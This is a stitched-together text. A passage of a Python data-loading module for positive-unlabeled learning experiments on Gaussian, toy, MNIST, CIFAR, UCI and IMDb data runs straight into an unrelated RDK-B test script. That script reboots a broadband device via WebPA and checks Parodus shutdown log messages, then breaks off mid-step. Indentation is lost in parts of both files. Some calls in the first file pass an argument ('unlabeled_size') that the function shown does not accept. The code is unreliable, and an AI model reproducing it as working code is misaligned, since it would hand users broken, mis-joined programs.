assert ((pos_size + int(unlabel_size*alpha)) < len(data_obj.p_data)), "Check sizes again"
assert ((int(unlabel_size*(1-alpha))) < len(data_obj.n_data)), "Check sizes again"
pos_data = data_obj.p_data[:pos_size]
unlabel_pos_data = data_obj.p_data[pos_size: pos_size+ int(unlabel_size*alpha)]
unlabel_neg_data = data_obj.n_data[:int(unlabel_size*(1-alpha))]
return PosData(transform=data_obj.transform, \
target_transform=data_obj.target_transform, \
data=pos_data, index=np.array(range(pos_size)), data_type=data_type), \
UnlabelData(transform=data_obj.transform, \
target_transform=data_obj.target_transform, \
pos_data=unlabel_pos_data, neg_data=unlabel_neg_data, \
index=np.array(range(unlabel_size)),data_type=data_type)
def get_PNDataSplits(data_obj, pos_size, neg_size, data_type=None):
unlabel_pos_data = data_obj.p_data[:pos_size]
unlabel_neg_data = data_obj.n_data[:neg_size]
return UnlabelData(transform=data_obj.transform, \
target_transform=data_obj.target_transform, \
pos_data=unlabel_pos_data, neg_data=unlabel_neg_data, \
index=np.array(range(pos_size + neg_size)),data_type=data_type)
def get_dataset(data_dir, data_type, net_type, device, alpha, beta, batch_size):
p_trainloader=None
u_trainloader=None
p_validloader=None
u_validloader=None
net=None
X=None
Y=None
if data_type=='gaussian':
'''
Gaussian Data hyperparameters and data
'''
num_points = 6000
input_size = 200
pos_size = 2000
gauss_traindata = Gaussain_data(mu=1.0, sigma=np.sqrt(input_size//2), size=num_points, dim=input_size//2)
gauss_testdata = Gaussain_data(mu=1.0, sigma=np.sqrt(input_size//2), size=num_points, dim=input_size//2)
p_traindata, u_traindata = get_PUDataSplits(gauss_traindata, pos_size=pos_size, alpha=alpha, beta=beta)
p_validdata , u_validdata = get_PUDataSplits(gauss_testdata, pos_size=pos_size, alpha=alpha, beta=beta)
X = p_traindata.data
Y = u_traindata.data
p_trainloader = torch.utils.data.DataLoader(p_traindata, batch_size=batch_size, \
shuffle=True, num_workers=2)
u_trainloader = torch.utils.data.DataLoader(u_traindata, batch_size=batch_size, \
shuffle=True, num_workers=2)
p_validloader = torch.utils.data.DataLoader(p_validdata, batch_size=batch_size, \
shuffle=True, num_workers=2)
u_validloader = torch.utils.data.DataLoader(u_validdata, batch_size=batch_size, \
shuffle=True, num_workers=2)
## Initialize model
net = get_model(net_type, input_dim = input_size)
net = net.to(device)
elif data_type=='toy_continuous':
'''
Toy dataset from P vs U failure for domain discrimination
'''
toy_traindata = ToyDataContinuous()
toy_testdata = ToyDataContinuous()
pos_size = 50
p_traindata, u_traindata = get_PUDataSplits(toy_traindata, pos_size=pos_size, alpha=alpha, beta=beta)
p_validdata, u_validdata = get_PUDataSplits(toy_testdata, pos_size=pos_size, alpha=alpha, beta=beta)
X = p_traindata.data
Y = u_traindata.data
p_trainloader = torch.utils.data.DataLoader(p_traindata, batch_size=pos_size, \
shuffle=True, num_workers=2)
u_trainloader = torch.utils.data.DataLoader(u_traindata, batch_size=pos_size, \
shuffle=True, num_workers=2)
p_validloader = torch.utils.data.DataLoader(p_validdata, batch_size=pos_size, \
shuffle=True, num_workers=2)
u_validloader = torch.utils.data.DataLoader(u_validdata, batch_size=pos_size, \
shuffle=True, num_workers=2)
## Initialize model
net = get_model(net_type, input_dim = 2)
net = net.to(device)
elif data_type=='toy_discrete':
toy_traindata = ToyData()
toy_testdata = ToyData()
pos_size = 8
p_traindata, u_traindata = get_PUDataSplits(toy_traindata, pos_size=pos_size, alpha=alpha, beta=beta)
p_validdata, u_validdata = get_PUDataSplits(toy_testdata, pos_size=pos_size, alpha=alpha, beta=beta)
X = p_traindata.data
Y = u_traindata.data
p_trainloader = torch.utils.data.DataLoader(p_traindata, batch_size=pos_size, \
shuffle=True, num_workers=2)
u_trainloader = torch.utils.data.DataLoader(u_traindata, batch_size=pos_size, \
shuffle=True, num_workers=2)
p_validloader = torch.utils.data.DataLoader(p_validdata, batch_size=pos_size, \
shuffle=True, num_workers=2)
u_validloader = torch.utils.data.DataLoader(u_validdata, batch_size=pos_size, \
shuffle=True, num_workers=2)
## Initialize model
net = get_model(net_type, input_dim = 2)
net = net.to(device)
elif data_type=='mnist_17':
transform_train = transforms.Compose([
torchvision.transforms.ToTensor(),
torchvision.transforms.Normalize(
(0.1307,), (0.3081,))
])
transform_test = transforms.Compose([
torchvision.transforms.ToTensor(),
torchvision.transforms.Normalize(
(0.1307,), (0.3081,))
])
traindata = MNIST17Data(root=data_dir, train=True, transform=transform_train)
testdata = MNIST17Data(root=data_dir, train=False, transform=transform_test)
p_traindata, u_traindata = get_PUDataSplits(traindata, pos_size=3000, alpha=alpha, beta=beta,data_type='mnist')
p_validdata, u_validdata = get_PUDataSplits(testdata, pos_size=500, alpha=alpha, beta=beta,data_type='mnist')
X = p_traindata.data.reshape((p_traindata.data.shape[0], -1))
Y = u_traindata.data.reshape((u_traindata.data.shape[0], -1))
p_trainloader = torch.utils.data.DataLoader(p_traindata, batch_size=batch_size, \
shuffle=True, num_workers=2)
u_trainloader = torch.utils.data.DataLoader(u_traindata, batch_size=batch_size, \
shuffle=True, num_workers=2)
p_validloader = torch.utils.data.DataLoader(p_validdata, batch_size=batch_size, \
shuffle=True, num_workers=2)
u_validloader = torch.utils.data.DataLoader(u_validdata, batch_size=batch_size, \
shuffle=True, num_workers=2)
## Initialize model
net = get_model(net_type, input_dim = 784)
net = net.to(device)
elif data_type=='mnist_binarized':
transform_train = transforms.Compose([
torchvision.transforms.ToTensor(),
torchvision.transforms.Normalize(
(0.1307,), (0.3081,))
])
transform_test = transforms.Compose([
torchvision.transforms.ToTensor(),
torchvision.transforms.Normalize(
(0.1307,), (0.3081,))
])
traindata = BinarizedMNISTData(root=data_dir, train=True, transform=transform_train)
testdata = BinarizedMNISTData(root=data_dir, train=False, transform=transform_test)
p_traindata, u_traindata = get_PUDataSplits(traindata, pos_size=15000, alpha=alpha, beta=beta,data_type='mnist')
p_validdata, u_validdata = get_PUDataSplits(testdata, pos_size=2500, alpha=alpha, beta=beta,data_type='mnist')
X = p_traindata.data.reshape((p_traindata.data.shape[0], -1))
Y = u_traindata.data.reshape((u_traindata.data.shape[0], -1))
p_trainloader = torch.utils.data.DataLoader(p_traindata, batch_size=batch_size, \
shuffle=True, num_workers=2)
u_trainloader = torch.utils.data.DataLoader(u_traindata, batch_size=batch_size, \
shuffle=True, num_workers=2)
p_validloader = torch.utils.data.DataLoader(p_validdata, batch_size=batch_size, \
shuffle=True, num_workers=2)
u_validloader = torch.utils.data.DataLoader(u_validdata, batch_size=batch_size, \
shuffle=True, num_workers=2)
## Initialize model
net = get_model(net_type, input_dim = 784)
net = net.to(device)
    elif data_type=='mnist_overlap':
        transform_train = transforms.Compose([
            torchvision.transforms.ToTensor(),
            torchvision.transforms.Normalize(
                (0.1307,), (0.3081,))
        ])
        transform_test = transforms.Compose([
            torchvision.transforms.ToTensor(),
            torchvision.transforms.Normalize(
                (0.1307,), (0.3081,))
        ])
        traindata = OverlapMNISTData(root=data_dir, train=True, transform=transform_train)
        testdata = OverlapMNISTData(root=data_dir, train=False, transform=transform_test)
        p_traindata, u_traindata = get_PUDataSplits(traindata, pos_size=15000, alpha=alpha, beta=beta, data_type='mnist')
        p_validdata, u_validdata = get_PUDataSplits(testdata, pos_size=2500, alpha=alpha, beta=beta, data_type='mnist')
        X = p_traindata.data.reshape((p_traindata.data.shape[0], -1))
        Y = u_traindata.data.reshape((u_traindata.data.shape[0], -1))
        p_trainloader = torch.utils.data.DataLoader(p_traindata, batch_size=batch_size, \
            shuffle=True, num_workers=2)
        u_trainloader = torch.utils.data.DataLoader(u_traindata, batch_size=batch_size, \
            shuffle=True, num_workers=2)
        p_validloader = torch.utils.data.DataLoader(p_validdata, batch_size=batch_size, \
            shuffle=True, num_workers=2)
        u_validloader = torch.utils.data.DataLoader(u_validdata, batch_size=batch_size, \
            shuffle=True, num_workers=2)
        ## Initialize model
        net = get_model(net_type, input_dim=784)
        net = net.to(device)
    elif data_type=='cifar_DogCat':
        transform_train = transforms.Compose([
            transforms.RandomCrop(32, padding=4),
            transforms.RandomHorizontalFlip(),
            transforms.ToTensor(),
            transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),
        ])
        transform_test = transforms.Compose([
            transforms.ToTensor(),
            transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),
        ])
        traindata = DogCatData(root=data_dir, train=True, transform=transform_train)
        testdata = DogCatData(root=data_dir, train=False, transform=transform_test)
        p_traindata, u_traindata = get_PUDataSplits(traindata, pos_size=2500, alpha=alpha, beta=beta, data_type='cifar')
        p_validdata, u_validdata = get_PUDataSplits(testdata, pos_size=500, alpha=alpha, beta=beta, data_type='cifar')
        X = p_traindata.data.reshape((p_traindata.data.shape[0], -1))
        Y = u_traindata.data.reshape((u_traindata.data.shape[0], -1))
        p_trainloader = torch.utils.data.DataLoader(p_traindata, batch_size=batch_size, \
            shuffle=True, num_workers=2)
        u_trainloader = torch.utils.data.DataLoader(u_traindata, batch_size=int(batch_size*(1-beta)/beta), \
            shuffle=True, num_workers=2)
        p_validloader = torch.utils.data.DataLoader(p_validdata, batch_size=batch_size, \
            shuffle=True, num_workers=2)
        u_validloader = torch.utils.data.DataLoader(u_validdata, batch_size=int(batch_size*(1-beta)/beta), \
            shuffle=True, num_workers=2)
        ## Initialize model
        net = get_model(net_type, input_dim=3072)
        net = net.to(device)
    elif data_type=='cifar_binarized':
        transform_train = transforms.Compose([
            transforms.RandomCrop(32, padding=4),
            transforms.RandomHorizontalFlip(),
            transforms.ToTensor(),
            transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),
        ])
        transform_test = transforms.Compose([
            transforms.ToTensor(),
            transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),
        ])
        traindata = BinarizedCifarData(root=data_dir, train=True, transform=transform_train)
        testdata = BinarizedCifarData(root=data_dir, train=False, transform=transform_test)
        p_traindata, u_traindata = get_PUDataSplits(traindata, pos_size=12500, alpha=alpha, beta=beta, data_type='cifar')
        p_validdata, u_validdata = get_PUDataSplits(testdata, pos_size=2500, alpha=alpha, beta=beta, data_type='cifar')
        X = p_traindata.data.reshape((p_traindata.data.shape[0], -1))
        Y = u_traindata.data.reshape((u_traindata.data.shape[0], -1))
        p_trainloader = torch.utils.data.DataLoader(p_traindata, batch_size=batch_size, \
            shuffle=True, num_workers=2)
        u_trainloader = torch.utils.data.DataLoader(u_traindata, batch_size=int(batch_size*(1-beta)/beta), \
            shuffle=True, num_workers=2)
        p_validloader = torch.utils.data.DataLoader(p_validdata, batch_size=batch_size, \
            shuffle=True, num_workers=2)
        u_validloader = torch.utils.data.DataLoader(u_validdata, batch_size=int(batch_size*(1-beta)/beta), \
            shuffle=True, num_workers=2)
        ## Initialize model
        net = get_model(net_type, input_dim=3072)
        net = net.to(device)
    elif data_type.startswith("UCI"):
        uci_data_type = data_type.split("_")[1]
        p_data, n_data = uci_data(uci_data_type)
        keep_num = min(len(p_data), len(n_data))
        p_data = p_data[:keep_num]
        n_data = n_data[:keep_num]
        train_p_size = keep_num//3
        test_p_size = keep_num//6
        traindata = UCI_data(p_data=p_data, n_data=n_data, train=True)
        testdata = UCI_data(p_data=p_data, n_data=n_data, train=False)
        p_traindata, u_traindata = get_PUDataSplits(traindata, pos_size=train_p_size, alpha=alpha, beta=beta, data_type='uci')
        p_validdata, u_validdata = get_PUDataSplits(testdata, pos_size=test_p_size, alpha=alpha, beta=beta, data_type='uci')
        X = p_traindata.data.reshape((p_traindata.data.shape[0], -1))
        Y = u_traindata.data.reshape((u_traindata.data.shape[0], -1))
        p_trainloader = torch.utils.data.DataLoader(p_traindata, batch_size=batch_size, \
            shuffle=True, num_workers=2)
        u_trainloader = torch.utils.data.DataLoader(u_traindata, batch_size=int(batch_size*(1-beta)/beta), \
            shuffle=True, num_workers=2)
        p_validloader = torch.utils.data.DataLoader(p_validdata, batch_size=batch_size, \
            shuffle=True, num_workers=2)
        u_validloader = torch.utils.data.DataLoader(u_validdata, batch_size=int(batch_size*(1-beta)/beta), \
            shuffle=True, num_workers=2)
        ## Initialize model
        net = get_model(net_type, input_dim=p_data.shape[-1])
        net = net.to(device)
    elif data_type=="IMDb_BERT":
        train_texts, train_labels = read_imdb_split(f'./{data_dir}/aclImdb/train')
        test_texts, test_labels = read_imdb_split(f'./{data_dir}/aclImdb/test')
        transform = initialize_bert_transform('distilbert-base-uncased')
        train_dataset = IMDbBERTData(train_texts, train_labels, transform=transform)
        test_dataset = IMDbBERTData(test_texts, test_labels, transform=transform)
        p_traindata, u_traindata = get_PUDataSplits(train_dataset, pos_size=6250, alpha=alpha, beta=beta, data_type='IMDb_BERT')
        p_validdata, u_validdata = get_PUDataSplits(test_dataset, pos_size=5000, alpha=alpha, beta=beta, data_type='IMDb_BERT')
        X = p_traindata.targets
        Y = u_traindata.targets
        p_trainloader = torch.utils.data.DataLoader(p_traindata, batch_size=8, \
            shuffle=True)
        u_trainloader = torch.utils.data.DataLoader(u_traindata, batch_size=8, \
            shuffle=True)
        p_validloader = torch.utils.data.DataLoader(p_validdata, batch_size=128, \
            shuffle=True)
        u_validloader = torch.utils.data.DataLoader(u_validdata, batch_size=128, \
            shuffle=True)
        ## Initialize model
        net = get_model(net_type)
        net = net.to(device)
    return p_trainloader, u_trainloader, p_validloader, u_validloader, net, X, Y, p_validdata, u_validdata, u_traindata
def get_PN_dataset(data_dir, data_type, net_type, device, alpha, beta, batch_size):
    u_trainloader = None
    u_validloader = None
    net = None
    if data_type=='gaussian':
        '''
        Gaussian Data hyperparameters and data
        '''
        num_points = 6000
        input_size = 200
        pos_size = 2000
        gauss_traindata = Gaussain_data(mu=1.0, sigma=np.sqrt(input_size//2), size=num_points, dim=input_size//2)
        gauss_testdata = Gaussain_data(mu=1.0, sigma=np.sqrt(input_size//2), size=num_points, dim=input_size//2)
        u_traindata = get_PNDataSplits(gauss_traindata, unlabeled_size=int(num_points//2))
        # draw the validation split from the held-out test data
        u_validdata = get_PNDataSplits(gauss_testdata, unlabeled_size=int(num_points//2))
        u_trainloader = torch.utils.data.DataLoader(u_traindata, batch_size=batch_size, \
            shuffle=True, num_workers=2)
        u_validloader = torch.utils.data.DataLoader(u_validdata, batch_size=batch_size, \
            shuffle=True, num_workers=2)
        ## Initialize model
        net = get_model(net_type, input_dim=input_size)
        net = net.to(device)
    elif data_type=='toy_continuous':
        '''
        Toy dataset from P vs U failure for domain discrimination
        '''
        toy_traindata = ToyDataContinuous()
        toy_testdata = ToyDataContinuous()
        pos_size = 50
        u_traindata = get_PNDataSplits(toy_traindata, unlabeled_size=pos_size*2)
        u_validdata = get_PNDataSplits(toy_testdata, unlabeled_size=pos_size*2)
        u_trainloader = torch.utils.data.DataLoader(u_traindata, batch_size=pos_size*2, \
            shuffle=True, num_workers=2)
        u_validloader = torch.utils.data.DataLoader(u_validdata, batch_size=pos_size*2, \
            shuffle=True, num_workers=2)
        ## Initialize model
        net = get_model(net_type, input_dim=2)
        net = net.to(device)
    elif data_type=='toy_discrete':
        toy_traindata = ToyData()
        toy_testdata = ToyData()
        pos_size = 8
        u_traindata = get_PNDataSplits(toy_traindata, unlabeled_size=pos_size)
        u_validdata = get_PNDataSplits(toy_testdata, unlabeled_size=pos_size)
        u_trainloader = torch.utils.data.DataLoader(u_traindata, batch_size=pos_size, \
            shuffle=True, num_workers=2)
        u_validloader = torch.utils.data.DataLoader(u_validdata, batch_size=pos_size, \
            shuffle=True, num_workers=2)
        ## Initialize model
        net = get_model(net_type, input_dim=2)
        net = net.to(device)
    elif data_type=='mnist_17':
        transform_train = transforms.Compose([
            torchvision.transforms.ToTensor(),
            torchvision.transforms.Normalize(
                (0.1307,), (0.3081,))
        ])
        transform_test = transforms.Compose([
            torchvision.transforms.ToTensor(),
            torchvision.transforms.Normalize(
                (0.1307,), (0.3081,))
        ])
        traindata = MNIST17Data(root=data_dir, train=True, transform=transform_train)
        testdata = MNIST17Data(root=data_dir, train=False, transform=transform_test)
        u_traindata = get_PNDataSplits(traindata, pos_size=3000, neg_size=int(3000*(1-alpha)*(1-beta)/beta), data_type='mnist')
        u_validdata = get_PNDataSplits(testdata, pos_size=int(500*alpha), neg_size=int(500*(1-alpha)), data_type='mnist')
        u_trainloader = torch.utils.data.DataLoader(u_traindata, batch_size=batch_size, \
            shuffle=True, num_workers=2)
        u_validloader = torch.utils.data.DataLoader(u_validdata, batch_size=batch_size, \
            shuffle=True, num_workers=2)
        ## Initialize model
        net = get_model(net_type, input_dim=784)
        net = net.to(device)
    elif data_type=='mnist_binarized':
        transform_train = transforms.Compose([
            torchvision.transforms.ToTensor(),
            torchvision.transforms.Normalize(
                (0.1307,), (0.3081,))
        ])
        transform_test = transforms.Compose([
            torchvision.transforms.ToTensor(),
            torchvision.transforms.Normalize(
                (0.1307,), (0.3081,))
        ])
        traindata = BinarizedMNISTData(root=data_dir, train=True, transform=transform_train)
        testdata = BinarizedMNISTData(root=data_dir, train=False, transform=transform_test)
        u_traindata = get_PNDataSplits(traindata, pos_size=15000, neg_size=int(15000*(1-alpha)*(1-beta)/beta), data_type='mnist')
        u_validdata = get_PNDataSplits(testdata, pos_size=int(2500*alpha), neg_size=int(2500*(1-alpha)), data_type='mnist')
        u_trainloader = torch.utils.data.DataLoader(u_traindata, batch_size=batch_size, \
            shuffle=True, num_workers=2)
        u_validloader = torch.utils.data.DataLoader(u_validdata, batch_size=batch_size, \
            shuffle=True, num_workers=2)
        ## Initialize model
        net = get_model(net_type, input_dim=784)
        net = net.to(device)
    elif data_type=='cifar_DogCat':
        transform_train = transforms.Compose([
            transforms.RandomCrop(32, padding=4),
            transforms.RandomHorizontalFlip(),
            transforms.ToTensor(),
            transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),
        ])
        transform_test = transforms.Compose([
            transforms.ToTensor(),
            transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),
        ])
        traindata = DogCatData(root=data_dir, train=True, transform=transform_train)
        testdata = DogCatData(root=data_dir, train=False, transform=transform_test)
        u_traindata = get_PNDataSplits(traindata, pos_size=2500, neg_size=int(2500*(1-alpha)*(1-beta)/beta), data_type='cifar')
        u_validdata = get_PNDataSplits(testdata, pos_size=int(500*alpha), neg_size=int(500*(1-alpha)), data_type='cifar')
        u_trainloader = torch.utils.data.DataLoader(u_traindata, batch_size=batch_size, \
            shuffle=True, num_workers=2)
        u_validloader = torch.utils.data.DataLoader(u_validdata, batch_size=batch_size, \
            shuffle=True, num_workers=2)
        ## Initialize model
        net = get_model(net_type, input_dim=3072)
        net = net.to(device)
    elif data_type=='cifar_binarized':
        transform_train = transforms.Compose([
            transforms.RandomCrop(32, padding=4),
            transforms.RandomHorizontalFlip(),
            transforms.ToTensor(),
            transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),
        ])
        transform_test = transforms.Compose([
            transforms.ToTensor(),
            transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),
        ])
        traindata = BinarizedCifarData(root=data_dir, train=True, transform=transform_train)
        testdata = BinarizedCifarData(root=data_dir, train=False, transform=transform_test)
        u_traindata = get_PNDataSplits(traindata, pos_size=12500, neg_size=int(12500*(1-alpha)*(1-beta)/beta), data_type='cifar')
        u_validdata = get_PNDataSplits(testdata, pos_size=int(2500*alpha), neg_size=int(2500*(1-alpha)), data_type='cifar')
        u_trainloader = torch.utils.data.DataLoader(u_traindata, batch_size=batch_size, \
            shuffle=True, num_workers=2)
        u_validloader = torch.utils.data.DataLoader(u_validdata, batch_size=batch_size, \
            shuffle=True, num_workers=2)
        ## Initialize model
        net = get_model(net_type, input_dim=3072)
        net = net.to(device)
    elif data_type=="IMDb_BERT":
        train_texts, train_labels = read_imdb_split(f'./{data_dir}/aclImdb/train')
        test_texts, test_labels = read_imdb_split(f'./{data_dir}/aclImdb/test')
        transform = initialize_bert_transform('distilbert-base-uncased')
        train_dataset = IMDbBERTData(train_texts, train_labels, transform=transform)
        test_dataset = IMDbBERTData(test_texts, test_labels, transform=transform)
        u_traindata = get_PNDataSplits(train_dataset, pos_size=6250, neg_size=int(6250*(1-alpha)*(1-beta)/beta), data_type='IMDb_BERT')
        u_validdata = get_PNDataSplits(test_dataset, pos_size=int(5000*alpha), neg_size=int(5000*(1-alpha)), data_type='IMDb_BERT')
        # X = p_traindata.targets
        # Y = u_traindata.targets
        u_trainloader = torch.utils.data.DataLoader(u_traindata, batch_size=8, \
            shuffle=True)
        u_validloader = torch.utils.data.DataLoader(u_validdata, batch_size=128, \
            shuffle=True)
        ## Initialize model
        net = get_model(net_type)
        net = net.to(device)
    return u_trainloader, u_validloader, net
##########################################################################
# If not stated otherwise in this file or this component's Licenses.txt
# file the following copyright and licenses apply:
#
# Copyright 2020 RDK Management
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##########################################################################
'''
<?xml version='1.0' encoding='utf-8'?>
<xml>
<id></id>
<!-- Do not edit id. This will be auto filled while exporting. If you are adding a new script keep the id empty -->
<version>3</version>
<!-- Do not edit version. This will be auto incremented while updating. If you are adding a new script you can keep the version as 1 -->
<name>TS_WEBPA_CheckLogs_ParodusShutdown</name>
<!-- If you are adding a new script you can specify the script name. Script Name should be unique same as this file name with out .py extension -->
<primitive_test_id></primitive_test_id>
<!-- Do not change primitive_test_id if you are editing an existing script. -->
<primitive_test_name>WEBPA_Donothing</primitive_test_name>
<!-- -->
<primitive_test_version>1</primitive_test_version>
<!-- -->
<status>FREE</status>
<!-- -->
<synopsis>To check for proper Parodus shutdown and SIGTERM received in Consolelog.txt.0 and PARODUSlog.txt.0 when rebooted by Device.X_CISCO_COM_DeviceControl.RebootDevice via WEBPA</synopsis>
<!-- -->
<groups_id />
<!-- -->
<execution_time>30</execution_time>
<!-- -->
<long_duration>false</long_duration>
<!-- -->
<advanced_script>false</advanced_script>
<!-- execution_time is the time out time for test execution -->
<remarks></remarks>
<!-- Reason for skipping the tests if marked to skip -->
<skip>false</skip>
<!-- -->
<box_types>
<box_type>Broadband</box_type>
<!-- -->
</box_types>
<rdk_versions>
<rdk_version>RDKB</rdk_version>
<!-- -->
</rdk_versions>
<test_cases>
<test_case_id>TC_WEBPA_38</test_case_id>
<test_objective>This test case checks for proper Parodus shutdown and SIGTERM received in Consolelog.txt.0 and PARODUSlog.txt.0 when rebooted by Device.X_CISCO_COM_DeviceControl.RebootDevice via WEBPA</test_objective>
<test_type>Positive</test_type>
<test_setup>Broadband</test_setup>
<pre_requisite>1.Ccsp Components should be in a running state of DUT
2.TDK Agent should be in running state or invoke it through StartTdk.sh script</pre_requisite>
<api_or_interface_used>N/A</api_or_interface_used>
<input_parameters>Device.DeviceInfo.X_RDKCENTRAL-COM_RFC.Feature.ManageableNotification.Enable
Device.X_CISCO_COM_DeviceControl.RebootDevice</input_parameters>
<automation_approch>1)Load the module
2)Get the Manageable Notification status using Device.DeviceInfo.X_RDKCENTRAL-COM_RFC.Feature.ManageableNotification.Enable Check if enabled if not enable it.
3)Check for PARODUSlog.txt.0 and Consolelog.txt.0 file presence.
4)Capture the tail -f of /rdklogs/logs/PARODUSlog.txt.0 in /nvram/tdk_PARODUStail
5)Capture the tail -f of /rdklogs/logs/Consolelog.txt.0 in /nvram/tdk_Consoletail
6)Trigger a reboot via Webpa using Device.X_CISCO_COM_DeviceControl.RebootDevice set to "Device"
7)Grep for the following in /nvram/tdk_PARODUStail and /nvram/tdk_Consoletail
grep -i "reboot-pending" /nvram/tdk_PARODUStail
grep -i "PARODUS: SIGTERM received" /nvram/tdk_PARODUStail
grep -i "PARODUS: cloud_status set as offline after connection close" /nvram/tdk_PARODUStail
grep -i "PARODUS: SIGTERM received" /nvram/tdk_PARODUStail
grep -i "Shutdown parodus" /nvram/tdk_Consoletail
8) Remove the file created rm -rf /nvram/tdk_PARODUStail and /nvram/tdk_Consoletail
9)Revert the Manageable Notification status to default if set
10)Unload the Module</automation_approch>
<expected_output>The log Message "reboot-pending","PARODUS: SIGTERM received","PARODUS: cloud_status set as offline after connection close","PARODUS: SIGTERM received","Shutdown parodus", should be available in the logs captured at the time of reboot initiation</expected_output>
<priority>High</priority>
<test_stub_interface>PAM</test_stub_interface>
<test_script>TS_WEBPA_CheckLogs_ParodusShutdown</test_script>
<skipped>No</skipped>
<release_version>M79</release_version>
<remarks>None</remarks>
</test_cases>
<script_tags />
</xml>
'''
# use tdklib library,which provides a wrapper for tdk testcase script
import tdklib;
import webpaUtility;
from webpaUtility import *
#Test component to be tested
obj1= tdklib.TDKScriptingLibrary("tdkbtr181","1");
obj2= tdklib.TDKScriptingLibrary("sysutil","1");
#IP and Port of box, No need to change,
#This will be replaced with corresponding DUT Ip and port while executing script
ip = <ipaddress>
port = <port>
obj1.configureTestCase(ip,port,'TS_WEBPA_CheckLogs_ParodusShutdown');
obj2.configureTestCase(ip,port,'TS_WEBPA_CheckLogs_ParodusShutdown');
#Get the result of connection with test component and DUT
loadmodulestatus1=obj1.getLoadModuleResult();
loadmodulestatus2=obj2.getLoadModuleResult();
setflag = 1;
revertflag = 0;
def verify_logMsgs(tdkTestObj):
    ParoduslogMsgs_list = ["reboot-pending","PARODUS: SIGTERM received","PARODUS: cloud_status set as offline after connection close","PARODUS: SIGTERM received"]
    ConsolelogMsgs_list = ["Shutdown parodus"]
    print "The following logs should be present when undergoing webpa reboot";
    print ParoduslogMsgs_list;
    print ConsolelogMsgs_list;
    for msg in ParoduslogMsgs_list:
        cmd = "cat /nvram/tdk_PARODUStail | grep -ire \"%s\"" %msg;
        tdkTestObj.addParameter("command",cmd);
        tdkTestObj.executeTestCase(expectedresult);
        actualresult = tdkTestObj.getResult();
        details = tdkTestObj.getResultDetails().strip().replace("\\n", "");
        print "LogMsg is :",details
        if expectedresult in actualresult and details != "" and msg in details:
            Pmsgpresent = 1;
        else:
            Pmsgpresent = 0;
            print "Log Message %s is NOT present" %msg
            break;
    for msg in ConsolelogMsgs_list:
        cmd = "cat /nvram/tdk_Consoletail | grep -ire \"%s\"" %msg;
        tdkTestObj.addParameter("command",cmd);
        tdkTestObj.executeTestCase(expectedresult);
        actualresult = tdkTestObj.getResult();
        details = tdkTestObj.getResultDetails().strip().replace("\\n", "");
        print "LogMsg is :",details
        if expectedresult in actualresult and details != "" and msg in details:
            Cmsgpresent = 1;
        else:
            Cmsgpresent = 0;
            print "Log Message %s is NOT present" %msg
            break;
    return Pmsgpresent,Cmsgpresent;
if "SUCCESS" in loadmodulestatus1.upper() and "SUCCESS" in loadmodulestatus2.upper() :
#Set the result status of execution
obj1.setLoadModuleStatus("SUCCESS");
obj2.setLoadModuleStatus("SUCCESS");
tdkTestObj = obj1.createTestStep('TDKB_TR181Stub_Get');
tdkTestObj.addParameter("ParamName","Device.DeviceInfo.X_RDKCENTRAL-COM_RFC.Feature.ManageableNotification.Enable");
expectedresult="SUCCESS";
#Execute the test case in DUT
tdkTestObj.executeTestCase(expectedresult);
actualresult = tdkTestObj.getResult();
default = tdkTestObj.getResultDetails();
if expectedresult in actualresult :
#Set the result status of execution
tdkTestObj.setResultStatus("SUCCESS");
print "TEST STEP 1: Get the status of Manageable Notification";
print "EXPECTED RESULT 1: Should get the status of Manageable Notification";
print "ACTUAL RESULT 1: Manageable Notification status is :%s" %default;
#Get the result of execution
print "[TEST EXECUTION RESULT] : SUCCESS";
if default != "true":
tdkTestObj = obj1.createTestStep('TDKB_TR181Stub_Set');
tdkTestObj.addParameter("ParamName","Device.DeviceInfo.X_RDKCENTRAL-COM_RFC.Feature.ManageableNotification.Enable");
tdkTestObj.addParameter("ParamValue","true");
tdkTestObj.addParameter("Type","bool");
expectedresult="SUCCESS";
#Execute the test case in DUT
tdkTestObj.executeTestCase(expectedresult);
actualresult = tdkTestObj.getResult();
details = tdkTestObj.getResultDetails();
if expectedresult in actualresult :
#Set the result status of execution
tdkTestObj.setResultStatus("SUCCESS");
print "TEST STEP 2: Set the status of Manageable Notification to true";
print "EXPECTED RESULT 2: Should set the status of Manageable Notification to true";
print "ACTUAL RESULT 2: Manageable Notification status is :%s" %details;
#Get the result of execution
print "[TEST EXECUTION RESULT] : SUCCESS";
revertflag = 1;
else:
#Set the result status of execution
tdkTestObj.setResultStatus("FAILURE");
print "TEST STEP 2: Set the status of Manageable Notification to true";
print "EXPECTED RESULT 2: Should set the status of Manageable Notification to true";
print "ACTUAL RESULT 2: Manageable Notification status is :%s" %details;
#Get the result of execution
print "[TEST EXECUTION RESULT] : FAILURE";
setflag = 0;
if setflag ==1 :
tdkTestObj = obj2.createTestStep('ExecuteCmd');
cmd = "[ -f /rdklogs/logs/PARODUSlog.txt.0 ] && echo \"File exist\" || echo \"File does not exist\"";
tdkTestObj.addParameter("command",cmd);
expectedresult="SUCCESS";
tdkTestObj.executeTestCase(expectedresult);
actualresult = tdkTestObj.getResult();
details = tdkTestObj.getResultDetails().strip().replace("\\n", "");
if details == "File exist":
tdkTestObj.setResultStatus("SUCCESS");
print "TEST STEP 2: Check for PARODUSlog.txt.0 log file presence";
print "EXPECTED RESULT 2:PARODUSlog.txt.0 log file should be present";
print "ACTUAL RESULT 2:PARODUSlog.txt.0 file is present";
#Get the result of execution
print "[TEST EXECUTION RESULT] : SUCCESS";
tdkTestObj = obj2.createTestStep('ExecuteCmd');
